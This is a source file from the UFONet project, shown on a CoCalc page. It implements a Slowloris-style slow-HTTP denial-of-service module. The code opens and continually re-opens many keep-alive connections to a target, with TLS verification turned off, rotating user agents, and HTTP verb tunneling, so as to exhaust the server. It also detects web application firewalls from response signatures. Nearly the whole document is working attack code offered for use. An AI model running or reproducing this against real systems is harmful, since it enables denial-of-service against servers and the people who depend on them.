Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
epsylon
GitHub Repository: epsylon/ufonet
Path: blob/master/core/mods/loris.py
1208 views
1
#!/usr/bin/env python3
2
# -*- coding: utf-8 -*-"
3
"""
4
This file is part of the UFONet project, https://ufonet.03c8.net
5
6
Copyright (c) 2013/2020 | psy <[email protected]>
7
8
You should have received a copy of the GNU General Public License along
9
with UFONet; if not, write to the Free Software Foundation, Inc., 51
10
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
11
"""
12
import socket, random, ssl, re
13
try:
14
from urlparse import urlparse
15
except:
16
from urllib.parse import urlparse
17
18
# UFONet Slow HTTP requests (LORIS) + [AI] WAF Detection
19
def setupSocket(self, ip):
20
method = random.choice(self.methods)
21
port = 80
22
if ip.startswith('http://'):
23
ip = ip.replace('http://','')
24
port = 80
25
elif ip.startswith('https://'):
26
ip = ip.replace('https://','')
27
port = 443
28
self.user_agent = random.choice(self.agents).strip()
29
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
30
sock.settimeout(10)
31
if port == 443:
32
sock = ssl.wrap_socket(sock, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1)
33
sock.connect((ip, port))
34
if method == "GET":
35
http_req = "GET / HTTP/1.1\r\nHost: "+str(ip)+"\r\nUser-Agent: "+str(self.user_agent)+"\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\n\r\n"
36
elif method == "POST":
37
http_req = "POST / HTTP/1.1\r\nHost: "+str(ip)+"\r\nUser-Agent: "+str(self.user_agent)+"\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\n\r\n"
38
else:
39
http_req = "POST / HTTP/1.1\r\nHost: "+str(ip)+"\r\nX-HTTP-Method: PUT\r\nUser-Agent: "+str(self.user_agent)+"\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\n\r\n" # "Verb Tunneling Abuse" -> [RFC2616]
40
sock.sendall(http_req.encode('utf-8'))
41
resp = sock.recv(1280).split("\n".encode('utf-8'))
42
for l in resp:
43
if "Location:".encode('utf-8') in l:
44
try:
45
ip = re.findall('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', l)[0] # extract new redirect url
46
try:
47
ip = socket.gethostbyname(ip)
48
except:
49
try:
50
import dns.resolver
51
r = dns.resolver.Resolver()
52
r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
53
url = urlparse(ip)
54
a = r.query(url.netloc, "A") # A record
55
for rd in a:
56
ip = str(rd)
57
except:
58
ip = target
59
except:
60
pass
61
else:
62
self.wafs_file = "core/txt/wafs.txt" # set source path to retrieve 'wafs'
63
try:
64
f = open(self.wafs_file)
65
wafs = f.readlines()
66
f.close()
67
except:
68
wafs = "broken!"
69
sep = "##"
70
for w in wafs:
71
if sep in w:
72
w = w.split(sep)
73
signature = w[0] # signature
74
t = w[1] # vendor
75
if signature in l.decode('utf-8'):
76
print("[Info] [AI] [Control] FIREWALL DETECTED!! -> [" , str(t.split("\n")[0]) , "]")
77
self.warn_flag = True
78
return
79
return sock, ip
80
81
def tractor(self, ip, requests):
82
n=0
83
try:
84
for i in range(requests):
85
n=n+1
86
try:
87
sock, ip = setupSocket(self, ip)
88
print("[Info] [AI] [LORIS] Firing 'tractor beam' ["+str(n)+"] -> [CONNECTED!]")
89
except:
90
print("[Error] [AI] [LORIS] Failed to engage with 'tractor beam' ["+str(n)+"]")
91
self.sockets.append(sock)
92
while True: # try to abuse HTTP Headers
93
for sock in list(self.sockets):
94
try:
95
sock, ip = setupSocket(self, ip)
96
except socket.error:
97
self.sockets.remove(sock)
98
for i in range(requests - len(self.sockets)):
99
print("[Info] [AI] [LORIS] Re-opening closed 'tractor beam' -> [RE-LINKED!]")
100
sock, ip = setupSocket(self, ip)
101
if sock:
102
self.sockets.append(sock)
103
except:
104
if self.warn_flag == False:
105
print("[Error] [AI] [LORIS] Failing to engage... -> Is still target online? -> [Checking!]")
106
else:
107
print("[Info] [AI] [LORIS] The attack may not be effective due to the presence of a [FIREWALL] that blocks persistent connections -> [ABORTING!]")
108
109
class LORIS(object):
110
def __init__(self):
111
self.warn_flag = False
112
self.sockets = []
113
self.agents_file = 'core/txt/user-agents.txt' # set source path to retrieve user-agents
114
self.agents = []
115
f = open(self.agents_file)
116
agents = f.readlines()
117
f.close()
118
for agent in agents:
119
self.agents.append(agent)
120
self.methods = ['GET', 'POST', 'X-METHOD'] # supported HTTP requests methods
121
122
def attacking(self, target, requests):
123
print("[Info] [AI] Slow HTTP requests (LORIS) is ready to fire: [" , requests, "tractor beams ]")
124
try:
125
ip = socket.gethostbyname(target)
126
except:
127
try:
128
import dns.resolver
129
r = dns.resolver.Resolver()
130
r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
131
url = urlparse(target)
132
a = r.query(url.netloc, "A") # A record
133
for rd in a:
134
ip = str(rd)
135
except:
136
ip = target
137
tractor(self, ip, requests) # attack with LORIS using threading
138
139